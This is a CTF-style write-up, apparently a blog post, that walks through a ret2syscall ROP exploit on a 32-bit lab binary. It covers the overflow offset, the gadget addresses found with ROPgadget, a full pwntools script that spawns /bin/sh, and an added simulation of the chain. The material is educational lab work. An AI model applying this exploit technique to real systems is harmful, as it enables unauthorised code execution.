Ropgadget -- ret2syscall
2022-07-23 06:15:00 【Mokapeng】
First grab the ret2syscall challenge binary; the environment has address randomization enabled.
Run checksec on it first.
NX is enabled.
RELRO: No RELRO (the relocation tables are not read-only):
RELRO stands for Relocation Read Only, meaning the relocation tables are made read-only. The relocation tables here are the .got and .plt tables.
RELRO comes in three levels: No RELRO, Partial RELRO and Full RELRO. With Full RELRO enabled we cannot modify the GOT.
Stack: No canary found (the stack can be overflowed).
NX: NX enabled (non-executable memory).
NX means the stack pages have no execute (x) permission; without it, shellcode written to the stack cannot be run. In this case we can use ROP (Return-Oriented Programming): use the stack overflow to lay out a sequence of addresses on the stack, so that execution flows through the existing instructions we want.
PIE: No PIE (the binary itself is not position independent, so its addresses are fixed regardless of ASLR).
So this challenge can be attacked with ROPgadget.
First disassemble the binary to check for a stack vulnerability. As the picture shows, there is an obvious stack overflow.
Next, find out how many bytes are needed to overflow up to the return address; a quick gdb session does it:
The calculation shows that 108+4=112 bytes of padding are needed before the return address is overwritten. The next question is what value to overwrite the return address with, and to answer that we must first decide which instructions we want executed.
Here we want it to run /bin/sh. The assembly that does this is:
mov eax, 0xb
mov ebx, ["/bin/sh"]
mov ecx, 0
mov edx, 0
int 0x80
==>execve("/bin/sh",NULL,NULL)
So we would like the overwritten return address to point at mov eax, 0xb.
We are unlikely to find exactly that instruction in the binary, but its only purpose is to put the value 0xb into eax, and pop eax achieves the same thing.
pop eax pops the value on top of the stack into eax. So we look for a pop eax instruction that is immediately followed by a ret: after the pop, the ret consumes the next word on the stack, which lets the overflow chain straight into the next instruction we want.
Use ROPgadget to search for pop/ret gadgets involving eax:
ROPgadget --binary ret2syscall --only "pop|ret" | grep eax

We can see that the address 0x080bb196 will do.
The next step is to find the remaining gadgets.
It turns out that 0x0806eb90 happens to be pop edx ; pop ecx ; pop ebx ; ret, so this one gadget covers the remaining three registers. Next we need the equivalent of mov ebx, ["/bin/sh"].
Search for /bin/sh in IDA: the string exists, at address 0x080BE408.
Finally we need int 0x80; ROPgadget --binary ret2syscall --only "int" finds it at 0x08049421.
At this point all the addresses have been found, and the constructed stack layout is:
The full script is:
from pwn import *

io = process("./ret2syscall")

# Gadget addresses found with ROPgadget; the binary is not PIE, so they are fixed
pop_eax_ret = 0x080bb196           # pop eax ; ret
pop_edx_ecx_ebx_ret = 0x0806eb90   # pop edx ; pop ecx ; pop ebx ; ret
int_80h = 0x08049421               # int 0x80
bin_sh = 0x080BE408                # "/bin/sh" string located in IDA

# 112 bytes of padding up to the saved return address, then the chain:
# eax = 0xb (execve), edx = 0, ecx = 0, ebx = "/bin/sh", then int 0x80
payload = flat([b'A' * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, bin_sh, int_80h])
io.sendline(payload)
io.interactive()
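The stack diagram referred to above did not survive in this copy of the post, so here is an added example (not part of the original writeup) that rebuilds it without pwntools. It packs the same chain with struct, prints the offset and meaning of every stack slot, and then walks the chain the way the CPU would, using the gadget semantics stated above (pop eax ; ret and pop edx ; pop ecx ; pop ebx ; ret), to show that the register state on reaching int 0x80 is exactly execve("/bin/sh", NULL, NULL). The gadget model in GADGETS and the PADDING value are taken from the writeup; everything else is an assumption of this example.

```python
import struct

# Addresses taken from the writeup above; the binary is not PIE, so they are fixed.
POP_EAX_RET = 0x080bb196           # pop eax ; ret
POP_EDX_ECX_EBX_RET = 0x0806eb90   # pop edx ; pop ecx ; pop ebx ; ret
INT_80H = 0x08049421               # int 0x80
BIN_SH = 0x080BE408                # "/bin/sh" string located with IDA
PADDING = 112                      # 108 bytes up to saved ebp + 4 bytes of saved ebp
SYS_EXECVE = 0xb                   # execve syscall number on 32-bit Linux

# Model of what each gadget pops before its final ret (assumption: from the writeup).
GADGETS = {
    POP_EAX_RET: ["eax"],
    POP_EDX_ECX_EBX_RET: ["edx", "ecx", "ebx"],
}


def p32(value):
    """Pack one 32-bit little-endian word, as pwntools' p32()/flat() do."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def build_chain():
    """Return (payload, layout): the bytes sent and a list of (offset, meaning, value)."""
    slots = [
        ("overwritten return address -> pop eax ; ret", POP_EAX_RET),
        ("popped into eax (execve syscall number)", SYS_EXECVE),
        ("ret -> pop edx ; pop ecx ; pop ebx ; ret", POP_EDX_ECX_EBX_RET),
        ("popped into edx (envp = NULL)", 0),
        ("popped into ecx (argv = NULL)", 0),
        ('popped into ebx (pointer to "/bin/sh")', BIN_SH),
        ("ret -> int 0x80", INT_80H),
    ]
    payload = b"A" * PADDING
    layout = []
    for meaning, value in slots:
        layout.append((len(payload), meaning, value))
        payload += p32(value)
    return payload, layout


def simulate(payload):
    """Walk the chain the way the CPU would: pop a word, run the gadget, ret again.

    Returns the register state when execution reaches int 0x80, or None if the
    chain returns into an address the gadget model does not know.
    """
    words = [struct.unpack("<I", payload[i:i + 4])[0]
             for i in range(PADDING, len(payload), 4)]
    regs = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0}
    pc = words.pop(0)                     # the first word replaces the saved eip
    while pc != INT_80H:
        if pc not in GADGETS:
            return None
        for reg in GADGETS[pc]:           # each pop consumes the next stack word
            regs[reg] = words.pop(0)
        pc = words.pop(0)                 # the gadget's ret consumes one more word
    return regs


if __name__ == "__main__":
    payload, layout = build_chain()
    for offset, meaning, value in layout:
        print(f"+{offset:3d}: {value:#010x}  {meaning}")
    print("registers at int 0x80:",
          {k: hex(v) for k, v in simulate(payload).items()})
```

Running it prints one line per stack slot starting at offset +112 and ends with eax=0xb, ebx=0x80be408, ecx=0x0, edx=0x0, which is the execve("/bin/sh", NULL, NULL) call the assembly above describes. The simulate() walk is also a cheap sanity check when a chain misbehaves: if a ret lands on an address that is not one of the modelled gadgets, it returns None instead of the register state.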

Done.